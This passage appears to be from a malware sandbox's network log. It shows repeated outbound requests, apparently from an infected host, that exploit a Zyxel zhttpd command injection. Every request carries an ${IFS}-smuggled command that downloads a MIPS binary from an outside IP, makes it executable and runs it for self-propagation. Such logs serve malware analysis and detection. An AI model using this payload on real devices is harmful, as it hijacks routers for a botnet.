                                                        Jan 28, 2024 10:12:48.326066971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3228192.168.2.1460144136.246.42.58443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.326103926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3229192.168.2.1454580174.238.178.240443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.326265097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3230192.168.2.145444673.34.41.3443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.326302052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3231192.168.2.1440392171.242.51.206443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.326345921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3232192.168.2.144837438.202.10.95443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.326380968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3233192.168.2.1456792195.157.235.247443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.326410055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3234192.168.2.1435688122.33.181.143443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.326494932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3235192.168.2.14469061.166.60.102443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.326494932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3236192.168.2.1446442170.95.133.244443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.326541901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3237192.168.2.1436898191.43.249.26443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.326572895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3238192.168.2.1455422125.36.24.194443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.326592922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3239192.168.2.144696837.167.32.31443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.326648951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3240192.168.2.1437468174.94.222.48443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.326692104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3241192.168.2.14476202.197.122.100443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.326761961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3242192.168.2.1444834192.207.152.6443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.326811075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3243192.168.2.1440978212.173.171.3443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.326860905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3244192.168.2.1452690202.40.208.116443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.326901913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3245192.168.2.1452270218.119.3.3443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.326940060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3246192.168.2.145126679.151.231.238443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.326967955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3247192.168.2.145669687.220.65.176443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.327008963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3248192.168.2.14355361.168.66.56443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.327039957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3249192.168.2.145537840.167.161.59443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.327095032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3250192.168.2.1446850196.190.1.201443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.327117920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3251192.168.2.1459828178.113.40.233443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.327147007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3252192.168.2.143336219.87.207.217443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.327198029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3253192.168.2.1455544159.35.166.185443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.327244043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3254192.168.2.1435118120.181.207.238443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.327275991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3255192.168.2.1439514211.131.116.101443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.327312946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3256192.168.2.143561034.203.98.62443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.327377081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3257192.168.2.1438564207.100.186.216443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.327424049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3258192.168.2.144357094.122.75.68443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.327450037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3259192.168.2.143706686.39.90.222443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.327486992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3260192.168.2.1456138182.248.124.59443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.327519894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3261192.168.2.146039019.114.84.111443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.327565908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3262192.168.2.145593831.19.189.103443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.327584028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3263192.168.2.145031266.226.146.13443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.327631950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3264192.168.2.144863845.39.22.66443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.327652931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3265192.168.2.1450218170.37.51.105443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.327676058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3266192.168.2.1437502117.138.107.51443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.327744007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3267192.168.2.1442726104.85.23.192443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.327795982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3268192.168.2.1433442163.52.225.88443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.327831030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3269192.168.2.145832646.126.110.189443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.327852964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3270192.168.2.1458646141.10.0.17443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.327923059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3271192.168.2.1438390197.79.101.149443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.327946901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3272192.168.2.145796652.145.67.70443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.327986956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3273192.168.2.1456824180.33.111.225443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.328017950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3274192.168.2.144781620.39.39.180443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.328071117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3275192.168.2.1438426191.221.28.126443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.328104973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3276192.168.2.1460186168.74.53.191443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.328151941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3277192.168.2.1438522202.252.87.105443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.328205109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3278192.168.2.1458632206.219.122.251443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.328238010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3279192.168.2.145965013.98.69.69443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.328273058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3280192.168.2.14375062.98.156.215443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.328334093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3281192.168.2.1441204128.235.10.171443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.328361988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3282192.168.2.144817064.21.244.202443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.328404903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3283192.168.2.1453832218.193.253.13443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.328414917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3284192.168.2.1460394180.170.41.103443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.328474998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3285192.168.2.143299450.188.55.99443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.328504086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3286192.168.2.1449050146.52.27.175443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.328552008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3287192.168.2.14571242.107.235.138443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.328589916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3288192.168.2.1436588154.45.253.203443
                                                        TimestampBytes transferredDirectionData
